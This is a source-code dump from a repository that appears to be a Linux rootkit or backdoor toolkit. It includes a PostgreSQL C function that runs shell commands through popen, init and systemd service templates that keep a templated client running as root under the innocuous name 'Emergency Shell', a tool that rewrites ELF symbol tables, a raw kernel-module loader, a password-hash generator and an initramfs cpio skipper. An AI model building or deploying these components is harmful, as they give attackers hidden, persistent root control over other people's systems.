28 | outlen = outlen + linelen;
29 | }
30 | pclose(pipe);
31 | if (*result)
32 | result[outlen-1] = 0x00;
33 | result_text = (text *)malloc(VARHDRSZ + strlen(result));
34 | #if PG_VERSION_NUM < 80300
35 | VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
36 | #elif PG_VERSION_NUM >= 80300
37 | SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
38 | #endif
39 | memcpy(VARDATA(result_text), result, strlen(result));
40 | PG_RETURN_POINTER(result_text);
41 | }
42 |
--------------------------------------------------------------------------------
/src/SERVICE/init.service:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | ### BEGIN INIT INFO
3 | # Provides: %%NS_NAME%%
4 | # Required-Start: $local_fs $network $named $time $syslog
5 | # Required-Stop: $local_fs $network $named $time $syslog
6 | # Default-Start: 2 3 4 5
7 | # Default-Stop: 0 1 6
8 | # Description: Emergency Shell
9 | ### END INIT INFO
10 |
11 | SCRIPT="%%CLIENT%%"
12 | RUNAS=root
13 |
14 | PIDFILE=/var/run/%%NS_NAME%%.pid
15 |
16 | start() {
17 | echo 'Starting service…' >&2
18 | local CMD="$SCRIPT"
19 | su -g %%MGID_NAME%% -c '"$CMD" $RUNAS' > "$PIDFILE"
20 | sleep 2
21 | PID=$(cat $PIDFILE)
22 | if pgrep -u $RUNAS -f $NAME > /dev/null; then
23 | echo "$NAME is now running, the PID is $PID"
24 | else
25 | echo ''
26 | echo "Error! Could not start $NAME!"
27 | fi
28 | }
29 |
30 | stop() {
31 | if [ ! -f "$PIDFILE" ] || ! kill -0 $(cat "$PIDFILE"); then
32 | echo 'Service not running' >&2
33 | return 1
34 | fi
35 | echo 'Stopping service…' >&2
36 | kill -15 $(cat "$PIDFILE") && rm -f "$PIDFILE"
37 | echo 'Service stopped' >&2
38 | }
39 |
40 | status() {
41 | printf "%-50s" "Checking ..."
42 | if [ -f $PIDFILE ] && [ -s $PIDFILE ]; then
43 | PID=$(cat $PIDFILE)
44 | if [ -z "$(ps axf | grep ${PID} | grep -v grep)" ]; then
45 | printf "%s\n" "The process appears to be dead but pidfile still exists"
46 | else
47 | echo "Running, the PID is $PID"
48 | fi
49 | else
50 | printf "%s\n" "Service not running"
51 | fi
52 | }
53 |
54 |
55 | case "$1" in
56 | start)
57 | start
58 | ;;
59 | stop)
60 | stop
61 | ;;
62 | status)
63 | status
64 | ;;
65 | restart)
66 | stop
67 | start
68 | ;;
69 | *)
70 | echo "Usage: $0 {start|stop|status|restart}"
71 | ;;
72 | esac
73 |
--------------------------------------------------------------------------------
/src/SERVICE/main.service:
--------------------------------------------------------------------------------
1 | # This file is part of systemd.
2 | #
3 | # systemd is free software; you can redistribute it and/or modify it
4 | # under the terms of the GNU Lesser General Public License as published by
5 | # the Free Software Foundation; either version 2.1 of the License, or
6 | # (at your option) any later version.
7 |
8 | [Unit]
9 | Description=Emergency Shell
10 | After=network.target
11 | StartLimitIntervalSec=0
12 |
13 | [Service]
14 | Type=simple
15 | Restart=on-failure
16 | RestartSec=1
17 | ExecStart=su -g %%MGID_NAME%% -c '%%CLIENT%% %%UUID%%'
18 | KillMode=process
19 |
20 | [Install]
21 | WantedBy=multi-user.target
22 |
--------------------------------------------------------------------------------
/src/SSHD/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Not-C-Developer/VERBA/5c8b03f54c3f3e05b80c7d97893163c4907ac5b8/src/SSHD/.keep
--------------------------------------------------------------------------------
/src/TOOLS/elfchngr.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 |
7 | #undef ELF_ST_BIND
8 | #undef ELF_ST_INFO
9 | #if defined(__i386__) || defined(i386) || defined(_M_IX86)
10 | typedef Elf32_Ehdr T_ehdr;
11 | typedef Elf32_Shdr T_shdr;
12 | typedef Elf32_Sym T_sym;
13 | typedef Elf32_Off T_off;
14 | typedef Elf32_Addr T_addr;
15 | typedef Elf32_Word T_word;
16 | typedef Elf32_Half T_half;
17 | #define ELF_ST_BIND ELF32_ST_BIND
18 | #define ELF_ST_INFO ELF32_ST_INFO
19 | #elif defined(__x86_64__) || defined(__amd64__) || defined(__x86_64) || defined(_M_AMD64)
20 | typedef Elf64_Ehdr T_ehdr;
21 | typedef Elf64_Shdr T_shdr;
22 | typedef Elf64_Sym T_sym;
23 | typedef Elf64_Off T_off;
24 | typedef Elf64_Addr T_addr;
25 | typedef Elf64_Word T_word;
26 | typedef Elf64_Half T_half;
27 | #define ELF_ST_BIND ELF64_ST_BIND
28 | #define ELF_ST_INFO ELF64_ST_INFO
29 | #else
30 | #error Unknown CPU, please report this to numpy maintainers with information about your platform (OS, CPU and compiler)
31 | #endif
32 |
33 | int ElfGetSectionByName(FILE *fd, T_ehdr *ehdr, char *section, T_shdr *shdr);
34 | int ElfGetSectionName(FILE *fd, T_word sh_name, T_shdr *shstrtable, char *res, size_t len);
35 | T_off ElfGetSymbolByName(FILE *fd, T_shdr *symtab, T_shdr *strtab, char *name, T_sym *sym);
36 | void ElfGetSymbolName(FILE *fd, T_word sym_name, T_shdr *strtable, char *res, size_t len);
37 | unsigned long ReorderSymbols(FILE *fd, T_shdr *symtab, T_shdr *strtab, char *name);
38 | int ReoderRelocation(FILE *fd, T_shdr *symtab, T_shdr *strtab, char *name, T_sym *sym);
39 | int ElfGetSectionByIndex(FILE *fd, T_ehdr *ehdr, T_half index, T_shdr *shdr);
40 |
41 | int main(int argc, char **argv){
42 | FILE *fd;
43 | T_ehdr hdr;
44 | T_shdr symtab, strtab;
45 | T_sym sym;
46 | T_off symoffset;
47 | T_addr value;
48 | unsigned long new_index = 0;
49 | int gflag = 0, vflag = 0, fflag = 0, sym_value = 0, opt;
50 | char *sym_name;
51 | long sym_off, str_off;
52 | if(argc != 4 && argc != 6)
53 | exit(-1);
54 | while((opt = getopt(argc, argv, "vsg")) != -1){
55 | switch(opt){
56 | case 'g':
57 | if(argc-1 < optind)
58 | exit(-2);
59 | gflag = 1;
60 | sym_name = argv[optind];
61 | break;
62 | case 's':
63 | if(argc-1 < optind)
64 | exit(-3);
65 | fflag = 1;
66 | sym_name = argv[optind];
67 | break;
68 | case 'v':
69 | if(argc-1 < optind)
70 | exit(-4);
71 | vflag = 1;
72 | sym_value = strtol(argv[optind], (char **)NULL, 16);
73 | break;
74 | default:
75 | exit(-5);
76 | }
77 | }
78 | fd = fopen(argv[argc-1], "r+");
79 | if(fd == NULL)
80 | exit(-6);
81 | if(fread(&hdr, sizeof(T_ehdr), 1, fd) < 1)
82 | exit(-7);
83 | sym_off = ElfGetSectionByName(fd, &hdr, ".symtab", &symtab);
84 | if(sym_off == -1)
85 | exit(-8);
86 | str_off = ElfGetSectionByName(fd, &hdr, ".strtab", &strtab);
87 | if(str_off == -1)
88 | exit(-9);
89 | symoffset = ElfGetSymbolByName(fd, &symtab, &strtab, sym_name, &sym);
90 | if((int)symoffset == -1)
91 | exit(-10);
92 | if(gflag == 1)
93 | if(ELF_ST_BIND(sym.st_info) == STB_LOCAL){
94 | unsigned char global;
95 | unsigned long offset = 0;
96 | new_index = ReorderSymbols(fd, &symtab, &strtab, sym_name);
97 | symoffset = ElfGetSymbolByName(fd, &symtab, &strtab, sym_name, &sym);
98 | if((int)symoffset == -1)
99 | exit(-11);
100 | offset = symoffset + 1 + sizeof(T_addr) + 1 + sizeof(T_word)+2;
101 | if(fseek(fd, offset, SEEK_SET) == -1)
102 | exit(-12);
103 | global = ELF_ST_INFO(STB_GLOBAL, STT_FUNC);
104 | if(fwrite(&global, sizeof(unsigned char), 1, fd) < 1)
105 | exit(-13);
106 | if(fseek(fd, sym_off, SEEK_SET) == -1)
107 | exit(-14);
108 | symtab.sh_info = new_index;
109 | if(fwrite(&symtab, sizeof(T_shdr), 1, fd) < 1)
110 | exit(-15);
111 | }else{}
112 | else if(fflag == 1 && vflag == 1){
113 | memset(&value, 0, sizeof(T_addr));
114 | memcpy(&value, &sym_value, sizeof(T_addr));
115 | #if defined(__i386__) || defined(i386) || defined(_M_IX86)
116 | if(fseek(fd, symoffset + sizeof(T_word), SEEK_SET) == -1)
117 | #elif defined(__x86_64__) || defined(__amd64__) || defined(__x86_64) || defined(_M_AMD64)
118 | if(fseek(fd, symoffset + sizeof(T_word) + 2 * sizeof(unsigned char) + sizeof(T_half), SEEK_SET) == -1)
119 | #endif
120 | exit(-16);
121 | if(fwrite(&value, sizeof(T_addr), 1, fd) < 1)
122 | exit(-17);
123 | fclose(fd);
124 | }
125 | return 0;
126 | }
127 |
128 | T_off ElfGetSymbolByName(FILE *fd, T_shdr *symtab, T_shdr *strtab, char *name, T_sym *sym){
129 | unsigned int i;
130 | char symname[255];
131 | for(i=0;i<(symtab->sh_size/symtab->sh_entsize);i++){
132 | if(fseek(fd, symtab->sh_offset + (i * symtab->sh_entsize), SEEK_SET) == -1)
133 | exit(-18);
134 | if(fread(sym, sizeof(T_sym), 1, fd) < 1)
135 | exit(-19);
136 | memset(symname, 0, sizeof(symname));
137 | ElfGetSymbolName(fd, sym->st_name, strtab, symname, sizeof(symname));
138 | if(!strcmp(symname, name))
139 | return symtab->sh_offset + (i * symtab->sh_entsize);
140 | }
141 | return -1;
142 | }
143 |
144 | unsigned long ReorderSymbols(FILE *fd, T_shdr *symtab, T_shdr *strtab, char *name){
145 | unsigned int i = 0, j = 0;
146 | char symname[255];
147 | T_sym *all, temp;
148 | unsigned long new_index = 0, my_off = 0;
149 | all = (T_sym *)malloc(sizeof(T_sym) * (symtab->sh_size/symtab->sh_entsize));
150 | if(all == NULL)
151 | return -1;
152 | memset(all, 0, symtab->sh_size/symtab->sh_entsize);
153 | my_off = symtab->sh_offset;
154 | for(i = 0; i < (symtab->sh_size/symtab->sh_entsize); i++){
155 | if(fseek(fd, symtab->sh_offset + (i * symtab->sh_entsize), SEEK_SET) == -1)
156 | exit(-20);
157 | if(fread(&all[i], sizeof(T_sym), 1, fd) < 1)
158 | exit(-21);
159 | memset(symname, 0, sizeof(symname));
160 | ElfGetSymbolName(fd, all[i].st_name, strtab, symname, sizeof(symname));
161 | if(!strcmp(symname, name)){
162 | j = i;
163 | continue;
164 | }
165 | }
166 | temp = all[j];
167 | for(i = j; i < (symtab->sh_size/symtab->sh_entsize); i++){
168 | if(i+1 >= symtab->sh_size/symtab->sh_entsize)
169 | break;
170 | if(ELF_ST_BIND(all[i+1].st_info) == STB_LOCAL)
171 | all[i] = all[i+1];
172 | else {
173 | new_index = i;
174 | all[i] = temp;
175 | break;
176 | }
177 | }
178 | if(fseek(fd, my_off, SEEK_SET) == -1)
179 | exit(-22);
180 | if(fwrite(all, sizeof(T_sym), symtab->sh_size/symtab->sh_entsize, fd) < (symtab->sh_size/symtab->sh_entsize))
181 | exit(-23);
182 | free(all);
183 | return new_index;
184 | }
185 |
186 | int ElfGetSectionByIndex(FILE *fd, T_ehdr *ehdr, T_half index, T_shdr *shdr){
187 | if(fseek(fd, ehdr->e_shoff + (index * ehdr->e_shentsize), SEEK_SET) == -1)
188 | exit(-24);
189 | if(fread(shdr, sizeof(T_shdr), 1, fd) < 1)
190 | exit(-25);
191 | return 0;
192 | }
193 |
194 | int ElfGetSectionByName(FILE *fd, T_ehdr *ehdr, char *section, T_shdr *shdr){
195 | int i;
196 | char name[255];
197 | T_shdr shstrtable;
198 | ElfGetSectionByIndex(fd, ehdr, ehdr->e_shstrndx, &shstrtable);
199 | memset(name, 0, sizeof(name));
200 | for(i = 0; i < ehdr->e_shnum; i++){
201 | if(fseek(fd, ehdr->e_shoff + (i * ehdr->e_shentsize), SEEK_SET) == -1)
202 | exit(-26);
203 | if(fread(shdr, sizeof(T_shdr), 1, fd) < 1)
204 | exit(-27);
205 | ElfGetSectionName(fd, shdr->sh_name, &shstrtable, name, sizeof(name));
206 | if(!strcmp(name, section))
207 | return ehdr->e_shoff + (i * ehdr->e_shentsize);
208 | }
209 | return -1;
210 | }
211 |
212 | int ElfGetSectionName(FILE *fd, T_word sh_name, T_shdr *shstrtable, char *res, size_t len){
213 | size_t i = 0;
214 | if(fseek(fd, shstrtable->sh_offset + sh_name, SEEK_SET) == -1)
215 | exit(-28);
216 | while((i < len-1) || *res != '\0'){
217 | *res = fgetc(fd);
218 | i++;
219 | res++;
220 | }
221 | return 0;
222 | }
223 |
224 | void ElfGetSymbolName(FILE *fd, T_word sym_name, T_shdr *strtable, char *res, size_t len){
225 | size_t i = 0;
226 | if(fseek(fd, strtable->sh_offset + sym_name, SEEK_SET) == -1)
227 | exit(-29);
228 | while((i < len-1) || *res != '\0'){
229 | *res = fgetc (fd);
230 | i++;
231 | res++;
232 | }
233 | return;
234 | }
235 |
--------------------------------------------------------------------------------
/src/TOOLS/loader.c:
--------------------------------------------------------------------------------
1 | #define _GNU_SOURCE
2 | #include
3 | #include
4 | #include
5 | #include
6 | #include
7 | #include
8 | #include
9 | #include
10 |
11 | #define init_module(module_image, len, param_values) syscall(__NR_init_module, module_image, len, param_values)
12 |
13 | int main(int argc, char **argv){
14 | int fd, ret = EXIT_FAILURE;
15 | struct stat st;
16 | size_t len;
17 | void *module_image;
18 | if (argc < 2)
19 | return ret;
20 | fd = open(argv[1], O_RDONLY);
21 | fstat(fd, &st);
22 | len = st.st_size;
23 | module_image = malloc(len);
24 | read(fd, module_image, len);
25 | ret = init_module(module_image, len, "");
26 | free(module_image);
27 | close(fd);
28 | return ret;
29 | }
30 |
--------------------------------------------------------------------------------
/src/TOOLS/passgen.c:
--------------------------------------------------------------------------------
1 | #define _GNU_SOURCE
2 | #include
3 | #include
4 | #include
5 | #include
6 |
7 | int main(int argc, char *argv[]){
8 | if (argc < 3 || (int) strlen(argv[2]) > 16)
9 | return 1;
10 | char salt[21];
11 | sprintf(salt, "$6$%s$", argv[2]);
12 | printf("%s\n", crypt((char*) argv[1], (char*) salt));
13 | return 0;
14 | }
15 |
--------------------------------------------------------------------------------
/src/TOOLS/skipcpio.c:
--------------------------------------------------------------------------------
1 | #define PROGRAM_VERSION_STRING "1"
2 | #define _GNU_SOURCE
3 | #include
4 | #include
5 | #include
6 | #include
7 | #include
8 |
9 | #define CPIO_END "TRAILER!!!"
10 | #define CPIO_ENDLEN (sizeof(CPIO_END)-1)
11 |
12 | static char buf[CPIO_ENDLEN * 2 + 1];
13 |
14 | int main(int argc, char **argv){
15 | FILE *f;
16 | size_t s;
17 | if(argc != 2){
18 | fprintf(stderr, "Usage: %s \n", argv[0]);
19 | exit(1);
20 | }
21 | f = fopen(argv[1], "r");
22 | if(f == NULL){
23 | fprintf(stderr, "Cannot open file '%s'\n", argv[1]);
24 | exit(1);
25 | }
26 | s = fread(buf, 6, 1, f);
27 | if(s <= 0){
28 | fprintf(stderr, "Read error from file '%s'\n", argv[1]);
29 | fclose(f);
30 | exit(1);
31 | }
32 | fseek(f, 0, SEEK_SET);
33 | if(buf[0] == '0' && buf[1] == '7' && buf[2] == '0' && buf[3] == '7' && buf[4] == '0' && buf[5] == '1'){
34 | long pos = 0;
35 | do{
36 | char *h;
37 | fseek(f, pos, SEEK_SET);
38 | buf[sizeof(buf) - 1] = 0;
39 | s = fread(buf, CPIO_ENDLEN, 2, f);
40 | if(s <= 0)
41 | break;
42 | h = strstr(buf, CPIO_END);
43 | if(h){
44 | pos = (h - buf) + pos + CPIO_ENDLEN;
45 | fseek(f, pos, SEEK_SET);
46 | break;
47 | }
48 | pos += CPIO_ENDLEN;
49 | } while(!feof(f));
50 | if(feof(f))
51 | fseek(f, 0, SEEK_SET);
52 | else{
53 | while(!feof(f)){
54 | size_t i;
55 | buf[sizeof(buf) - 1] = 0;
56 | s = fread(buf, 1, sizeof(buf) - 1, f);
57 | if(s <= 0)
58 | break;
59 | for(i = 0; (i < s) && (buf[i] == 0); i++);
60 | if (buf[i] != 0){
61 | pos += i;
62 | fseek(f, pos, SEEK_SET);
63 | break;
64 | }
65 | pos += s;
66 | }
67 | }
68 | }
69 | while (!feof(f)){
70 | s = fread(buf, 1, sizeof(buf), f);
71 | if (s <= 0)
72 | break;
73 | s = fwrite(buf, 1, s, stdout);
74 | if (s <= 0)
75 | break;
76 | }
77 | fclose(f);
78 | return EXIT_SUCCESS;
79 | }
80 |
--------------------------------------------------------------------------------